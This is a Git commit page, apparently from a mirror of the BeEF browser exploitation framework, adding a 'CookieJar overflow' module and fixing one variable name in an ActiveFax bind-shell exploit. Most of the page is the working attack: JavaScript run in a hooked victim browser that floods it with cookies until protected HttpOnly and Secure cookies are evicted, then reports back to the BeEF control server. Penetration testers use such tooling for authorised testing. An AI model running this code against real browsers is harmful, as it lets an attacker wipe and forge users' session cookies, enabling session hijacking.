Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #963 from bmantra/master

Browse Source 
Inital version of CookieJar overflow module.  And minor bugfix of active…  closes #935
This commit is contained in:
bmantra
2014-01-19 11:02:13 -08:00
parent 275db51dd2 0e57fb0be1
commit b2d03e9364
4 changed files with 111 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

79
modules/browser/hooked_domain/overflow_cookiejar/command.js Normal file
View File

@@ -0,0 +1,79 @@
//
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var preserveCookies = '<%= @preserveCookies %>'
var initialtimestamp;
var currenttimestamp;
var i = 0;
var preservedCookies;
function setCookie(cname,cvalue){
document.cookie = cname + "=" + cvalue;
}
function getCookie(cname){
var name = cname + "=";
var ca = document.cookie.split(';');
for(var i=0; i<ca.length; i++){
var c = ca[i].trim();
if (c.indexOf(name)==0) return c.substring(name.length,c.length);
}
return "";
}
function deleteAllCookies(){
var cookies = document.cookie.split(";");
if (cookies.length > 0){
var cookie = cookies[0];
var eqPos = cookie.indexOf("=");
var name = eqPos > -1 ? cookie.substr(0, eqPos) : cookie;
document.cookie = name + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT";
if (cookies.length > 1){
//Timeout needed because otherwise cookie write loop freezes render thread
setTimeout(deleteAllCookies,1);
}
else{
if (preserveCookies){
var pc = preservedCookies.split(';');
for(var i=0; i<pc.length; i++){
var c = pc[i].trim();
document.cookie = c;
}
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'Attempt to overflow the Cookie Jar completed');
}
}
}
function overflowCookie() {
if(getCookie(initialtimestamp) === "BeEF") {
currenttimestamp = Date.now();
setCookie(currenttimestamp,"BeEF");
//Timeout needed because otherwise cookie write loop freezes render thread
setTimeout(overflowCookie, 1);
}
else{
deleteAllCookies();
}
}
function overflowCookieJar(){
preservedCookies = document.cookie;
initialtimestamp = Date.now();
setCookie(initialtimestamp,"BeEF");
overflowCookie();
}
overflowCookieJar();
});

15
modules/browser/hooked_domain/overflow_cookiejar/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
overflow_cookiejar:
enable: true
category: ["Browser", "Hooked Domain"]
name: "Overflow Cookie Jar"
description: "This module attempts to perform John Wilander's CookieJar overflow. He demonstrated this in his <a href='https://www.owasp.org/index.php/OWASP_1-Liner'>Owasp 1-liner project</a>. With this module, cookies that have the HTTPOnly-flag and/or HTTPS-flag can be wiped. You can try to recreate these cookies afterwards as normal cookies."
authors: ["Bart Leppens"]
target:
working: ["S","C","FF","IE"]

16
modules/browser/hooked_domain/overflow_cookiejar/module.rb Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Overflow_cookiejar < BeEF::Core::Command
def self.options
return [
{'name' => 'preserveCookies', 'type' => 'checkbox', 'ui_label' => 'Attempt to preserve all non-httpOnly cookies', 'checked' => 'true'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

2
modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/command.js
View File

@@ -35,7 +35,7 @@ sendpayload = function(payload, uri, timeout, logdata){
this.send(ui8Data);
};
}
xhr.open("POST", url, true);
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.setRequestHeader('Accept','*/*');
xhr.setRequestHeader("Accept-Language", "en");